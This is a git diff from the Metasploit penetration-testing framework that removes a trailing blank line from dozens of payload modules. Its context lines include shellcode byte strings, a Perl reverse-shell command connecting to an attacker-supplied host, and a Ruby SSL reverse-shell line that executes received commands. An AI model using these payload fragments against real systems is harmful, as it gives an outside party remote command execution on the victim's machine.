a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb @@ -136,5 +136,4 @@ module MetasploitModule p end - end diff --git a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb index 57b8082aca..ccc3829b2a 100644 --- a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb @@ -136,5 +136,4 @@ module MetasploitModule p end - end diff --git a/modules/payloads/singles/linux/mipsbe/exec.rb b/modules/payloads/singles/linux/mipsbe/exec.rb index 5a82591eeb..26a4112aa4 100644 --- a/modules/payloads/singles/linux/mipsbe/exec.rb +++ b/modules/payloads/singles/linux/mipsbe/exec.rb @@ -75,5 +75,4 @@ module MetasploitModule return super + shellcode end - end diff --git a/modules/payloads/singles/linux/mipsbe/reboot.rb b/modules/payloads/singles/linux/mipsbe/reboot.rb index 2b7dc471a2..edac729019 100644 --- a/modules/payloads/singles/linux/mipsbe/reboot.rb +++ b/modules/payloads/singles/linux/mipsbe/reboot.rb @@ -51,5 +51,4 @@ module MetasploitModule return super + shellcode end - end diff --git a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb index 94d8873e44..baafceba44 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb @@ -122,5 +122,4 @@ module MetasploitModule return super + shellcode end - end diff --git a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb index 603e0fb869..4360536a9a 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb @@ -120,5 +120,4 @@ module MetasploitModule return super + shellcode end - end diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb index e66f999f8c..ef23167e97 100644 --- a/modules/payloads/singles/linux/mipsle/exec.rb +++ b/modules/payloads/singles/linux/mipsle/exec.rb @@ -76,5 +76,4 @@ module MetasploitModule return super + shellcode end - end diff --git a/modules/payloads/singles/linux/mipsle/reboot.rb b/modules/payloads/singles/linux/mipsle/reboot.rb index 2d2da0b4a5..9fe0974aa5 100644 --- a/modules/payloads/singles/linux/mipsle/reboot.rb +++ b/modules/payloads/singles/linux/mipsle/reboot.rb @@ -50,5 +50,4 @@ module MetasploitModule return super + shellcode end - end diff --git a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb index 48fbde0737..7367cd4c85 100644 --- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb @@ -114,5 +114,4 @@ module MetasploitModule return super + shellcode end - end diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index 78aa63ad2c..3a28c9c811 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -116,5 +116,4 @@ module MetasploitModule return super + shellcode end - end diff --git a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb index 0e11e4abda..ba4c0d6ebd 100644 --- a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb @@ -90,5 +90,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/ppc/shell_find_port.rb b/modules/payloads/singles/linux/ppc/shell_find_port.rb index ca1ba81ad1..e4b7751e0b 100644 --- a/modules/payloads/singles/linux/ppc/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc/shell_find_port.rb @@ -77,5 +77,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb index 6232fd7767..007ab7dcb7 100644 --- a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb @@ -81,5 +81,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb index c444ddd7f1..aa7f3092aa 100644 --- a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb @@ -90,5 +90,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/ppc64/shell_find_port.rb b/modules/payloads/singles/linux/ppc64/shell_find_port.rb index 3f674591a0..27d81dfae9 100644 --- a/modules/payloads/singles/linux/ppc64/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc64/shell_find_port.rb @@ -77,5 +77,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb index 89cb7af59d..e54049a872 100644 --- a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb @@ -81,5 +81,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb index 8d892dec47..4e17522972 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb @@ -79,5 +79,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb index a68ae099a3..84f5965016 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb @@ -58,5 +58,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index e38108e8ba..5f7590f22d 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb @@ -53,5 +53,4 @@ module MetasploitModule "\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58" + "\xcd\x80" end - end diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index 9cc4413820..41e58d62e2 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -45,5 +45,4 @@ module MetasploitModule Rex::Arch::X86.call(cmd.length + 1) + cmd + "\x00" + "\x57\x53\x89\xe1\xcd\x80" end - end diff --git a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb index 30d41b4ad6..2bf6995b02 100644 --- a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb @@ -32,5 +32,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb index d7e213b22d..efc756d132 100644 --- a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb @@ -32,5 +32,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb index 907c659cf4..070d0e7f87 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb @@ -84,5 +84,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb index 47206af55d..4e6274e12f 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb @@ -59,5 +59,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/x86/shell_find_port.rb b/modules/payloads/singles/linux/x86/shell_find_port.rb index 1b98c9d259..1866e5d1f2 100644 --- a/modules/payloads/singles/linux/x86/shell_find_port.rb +++ b/modules/payloads/singles/linux/x86/shell_find_port.rb @@ -67,5 +67,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/linux/x86/shell_find_tag.rb b/modules/payloads/singles/linux/x86/shell_find_tag.rb index cac0120ad2..b336f65bd1 100644 --- a/modules/payloads/singles/linux/x86/shell_find_tag.rb +++ b/modules/payloads/singles/linux/x86/shell_find_tag.rb @@ -49,5 +49,4 @@ module MetasploitModule super end - end diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index 3c0b1c45ed..8d541422ab 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -79,5 +79,4 @@ module MetasploitModule "\xb0\x0b" +# mov al,0xb (execve) "\xcd\x80" # int 0x80 end - end diff --git a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb index a60604a5e6..96e741738d 100644 --- a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb @@ -106,5 +106,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb index d2e1bef833..c9103a1bdc 100644 --- a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb @@ -93,5 +93,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/osx/armle/vibrate.rb b/modules/payloads/singles/osx/armle/vibrate.rb index b2bb63a38d..34eec1206a 100644 --- a/modules/payloads/singles/osx/armle/vibrate.rb +++ b/modules/payloads/singles/osx/armle/vibrate.rb @@ -31,5 +31,4 @@ module MetasploitModule 0x03ea4444 # Parameter: 0x03ea ].pack("V*") end - end diff --git a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb index 746d25b74d..cda4bd4d6c 100644 --- a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb @@ -50,5 +50,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb index 69340f6695..40e6c44b7f 100644 --- a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb @@ -48,5 +48,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb index 2bc811876c..93d439ceec 100644 --- a/modules/payloads/singles/osx/x64/shell_find_tag.rb +++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb @@ -78,5 +78,4 @@ module MetasploitModule "\x48\x89\xE6" + # mov rsi,rsp "\x0F\x05" # loadall286 end - end diff --git a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb index 81571831eb..282d889135 100644 --- a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb @@ -74,5 +74,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/osx/x86/shell_find_port.rb b/modules/payloads/singles/osx/x86/shell_find_port.rb index ed99ca0b59..02f2c898b7 100644 --- a/modules/payloads/singles/osx/x86/shell_find_port.rb +++ b/modules/payloads/singles/osx/x86/shell_find_port.rb @@ -69,5 +69,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb index 0931dfb029..83ccb154f7 100644 --- a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb @@ -68,5 +68,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb index fda58e0fcf..b47273f5d8 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb @@ -54,5 +54,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb index 3624000c9e..641bcf839a 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb @@ -53,5 +53,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/php/bind_perl.rb b/modules/payloads/singles/php/bind_perl.rb index 5889c06dff..f51f1ad3cd 100644 --- a/modules/payloads/singles/php/bind_perl.rb +++ b/modules/payloads/singles/php/bind_perl.rb @@ -51,5 +51,4 @@ module MetasploitModule return cmd end - end diff --git a/modules/payloads/singles/php/bind_perl_ipv6.rb b/modules/payloads/singles/php/bind_perl_ipv6.rb index 1459ac4a8b..955937bb87 100644 --- a/modules/payloads/singles/php/bind_perl_ipv6.rb +++ b/modules/payloads/singles/php/bind_perl_ipv6.rb @@ -51,5 +51,4 @@ module MetasploitModule return cmd end - end diff --git a/modules/payloads/singles/php/bind_php.rb b/modules/payloads/singles/php/bind_php.rb index 7b56cebcb3..8cf6dd6e22 100644 --- a/modules/payloads/singles/php/bind_php.rb +++ b/modules/payloads/singles/php/bind_php.rb @@ -82,5 +82,4 @@ module MetasploitModule def generate return super + php_bind_shell end - end diff --git a/modules/payloads/singles/php/bind_php_ipv6.rb b/modules/payloads/singles/php/bind_php_ipv6.rb index a049f1da76..f3a78e0d0b 100644 --- a/modules/payloads/singles/php/bind_php_ipv6.rb +++ b/modules/payloads/singles/php/bind_php_ipv6.rb @@ -82,5 +82,4 @@ module MetasploitModule def generate return super + php_bind_shell end - end diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb index b5ae1d0b77..82c139b472 100644 --- a/modules/payloads/singles/php/download_exec.rb +++ b/modules/payloads/singles/php/download_exec.rb @@ -78,5 +78,4 @@ module MetasploitModule def generate return php_exec_file end - end diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb index 29140657e3..0215d7a731 100644 --- a/modules/payloads/singles/php/exec.rb +++ b/modules/payloads/singles/php/exec.rb @@ -49,5 +49,4 @@ module MetasploitModule def generate return php_exec_cmd end - end diff --git a/modules/payloads/singles/php/reverse_perl.rb b/modules/payloads/singles/php/reverse_perl.rb index a166d86a78..5cdb636948 100644 --- a/modules/payloads/singles/php/reverse_perl.rb +++ b/modules/payloads/singles/php/reverse_perl.rb @@ -55,5 +55,4 @@ module MetasploitModule lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" end - end diff --git a/modules/payloads/singles/php/reverse_php.rb b/modules/payloads/singles/php/reverse_php.rb index 17aef9a142..da608b1105 100644 --- a/modules/payloads/singles/php/reverse_php.rb +++ b/modules/payloads/singles/php/reverse_php.rb @@ -128,5 +128,4 @@ module MetasploitModule def generate return super + php_reverse_shell end - end diff --git a/modules/payloads/singles/php/shell_findsock.rb b/modules/payloads/singles/php/shell_findsock.rb index e2f8c1200a..7d6d5e733c 100644 --- a/modules/payloads/singles/php/shell_findsock.rb +++ b/modules/payloads/singles/php/shell_findsock.rb @@ -84,5 +84,4 @@ END_OF_PHP_CODE def generate return php_findsock end - end diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index ee86217655..cd77a02d23 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -42,5 +42,4 @@ module MetasploitModule met = stage_meterpreter(opts) py_create_exec_stub(met) end - end diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index f02d2fdf6d..d2cc22751d 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -43,5 +43,4 @@ module MetasploitModule py_create_exec_stub(met) end - end diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index 3ae37a307f..3a71709b0e 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -44,5 +44,4 @@ module MetasploitModule py_create_exec_stub(met) end - end diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index 1e7bab7e11..2b1ac4e60a 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -40,5 +40,4 @@ module MetasploitModule met = stage_meterpreter(opts) py_create_exec_stub(met) end - end diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb index bd35ab038a..f3254d640c 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp.rb @@ -64,6 +64,5 @@ module MetasploitModule cmd end - end diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb index 6b82989708..8359027b8b 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb @@ -44,5 +44,4 @@ module MetasploitModule rbs << "\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end" return rbs end - end diff --git a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb index 95429bbbd2..39e0b1488e 100644 --- a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb @@ -44,5 +44,4 @@ module MetasploitModule "\x92\x23\xa0\x08\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc" + "\x82\x10\x20\x3b\x91\xd0\x20\x08" end - end diff --git a/modules/payloads/singles/solaris/sparc/shell_find_port.rb b/modules/payloads/singles/solaris/sparc/shell_find_port.rb index 0525e4d8aa..7d61e2716e 100644 --- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb +++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb @@ -40,5 +40,4 @@ module MetasploitModule "\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\xe0\x3b\xbf\xf0" + "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" end - end diff --git a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb index 9613d62d8c..0cf309e113 100644 --- a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb @@ -49,5 +49,4 @@ module MetasploitModule "\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\xe0\x3b\xbf\xf0" + "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" end - end diff --git a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb index 0b60c0cb24..ee4bb81136 100644 --- a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb @@ -83,5 +83,4 @@ module MetasploitModule "\xff\xd6" # call *%esi # })) end - end diff --git a/modules/payloads/singles/solaris/x86/shell_find_port.rb b/modules/payloads/singles/solaris/x86/shell_find_port.rb index ee77e80802..0a5431e071 100644 --- a/modules/payloads/singles/solaris/x86/shell_find_port.rb +++ b/modules/payloads/singles/solaris/x86/shell_find_port.rb @@ -81,5 +81,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb index c8cc80b649..728dc0d984 100644 --- a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb @@ -80,5 +80,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/tty/unix/interact.rb b/modules/payloads/singles/tty/unix/interact.rb index b070e2f386..f4dd4446f3 100644 --- a/modules/payloads/singles/tty/unix/interact.rb +++ b/modules/payloads/singles/tty/unix/interact.rb @@ -30,5 +30,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/windows/messagebox.rb b/modules/payloads/singles/windows/messagebox.rb index d702bf28d1..e065a1f234 100644 --- a/modules/payloads/singles/windows/messagebox.rb +++ b/modules/payloads/singles/windows/messagebox.rb @@ -294,5 +294,4 @@ EOS pushes end - end diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index c6f59f17ec..f30ea4dab9 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -65,6 +65,5 @@ module MetasploitModule # return the binary version of it config.to_b end - end diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 98f37ed5e7..62b579b690 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -65,5 +65,4 @@ module MetasploitModule # return the binary version of it config.to_b end - end diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 36eb2c49bb..e399d45e7f 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -66,6 +66,5 @@ module MetasploitModule # return the binary version of it config.to_b end - end diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index 1242ff4334..ba5070fb26 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -65,6 +65,5 @@ module MetasploitModule # return the binary version of it config.to_b end - end diff --git a/modules/payloads/singles/windows/metsvc_bind_tcp.rb b/modules/payloads/singles/windows/metsvc_bind_tcp.rb index d20b255712..d725300296 100644 --- a/modules/payloads/singles/windows/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_bind_tcp.rb @@ -32,5 +32,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb index afd53ced3c..7a848e9418 100644 --- a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb @@ -32,5 +32,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/windows/shell_bind_tcp.rb b/modules/payloads/singles/windows/shell_bind_tcp.rb index 18867c9b4a..5264317212 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp.rb @@ -57,5 +57,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb index 088bd61b40..c1117efa13 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb @@ -85,5 +85,4 @@ module MetasploitModule end return false end - end diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index 72bde4c61e..29c9b5df22 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -75,6 +75,5 @@ module MetasploitModule OptAddress.new('AHOST', [true, "IP address allowed", nil]) ]) end - end diff --git a/modules/payloads/singles/windows/shell_reverse_tcp.rb b/modules/payloads/singles/windows/shell_reverse_tcp.rb index 73acda04be..8cc8515445 100644 --- a/modules/payloads/singles/windows/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/shell_reverse_tcp.rb @@ -58,5 +58,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/windows/speak_pwned.rb b/modules/payloads/singles/windows/speak_pwned.rb index a4740ac3c5..8571fd3b91 100644 --- a/modules/payloads/singles/windows/speak_pwned.rb +++ b/modules/payloads/singles/windows/speak_pwned.rb @@ -84,5 +84,4 @@ module MetasploitModule # EXITFUNC is not supported :/ deregister_options('EXITFUNC') end - end diff --git a/modules/payloads/singles/windows/x64/exec.rb b/modules/payloads/singles/windows/x64/exec.rb index fd0c189830..71025e73e9 100644 --- a/modules/payloads/singles/windows/x64/exec.rb +++ b/modules/payloads/singles/windows/x64/exec.rb @@ -57,5 +57,4 @@ module MetasploitModule def command_string return datastore['CMD'] || '' end - end diff --git a/modules/payloads/singles/windows/x64/loadlibrary.rb b/modules/payloads/singles/windows/x64/loadlibrary.rb index b66672e21a..4e7d5ccf88 100644 --- a/modules/payloads/singles/windows/x64/loadlibrary.rb +++ b/modules/payloads/singles/windows/x64/loadlibrary.rb @@ -61,5 +61,4 @@ module MetasploitModule def dll_string return datastore['DLL'] || '' end - end diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 4c605ed326..31010074b2 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -65,7 +65,6 @@ module MetasploitModule # return the binary version of it config.to_b end - end diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 8f923889d4..7a286121f1 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -65,5 +65,4 @@ module MetasploitModule # return the binary version of it config.to_b end - end diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index a53955e0bc..7fa21b8d80 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -65,5 +65,4 @@ module MetasploitModule # return the binary version of it config.to_b end - end diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index f124b564ea..4bd75015e9 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -66,7 +66,6 @@ module MetasploitModule # return the binary version of it config.to_b end - end diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 162f6e45e8..9861d97b5a 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -65,6 +65,5 @@ module MetasploitModule # return the binary version of it config.to_b end - end diff --git a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb index b63ece3258..358fae4f64 100644 --- a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb @@ -68,5 +68,4 @@ module MetasploitModule } )) end 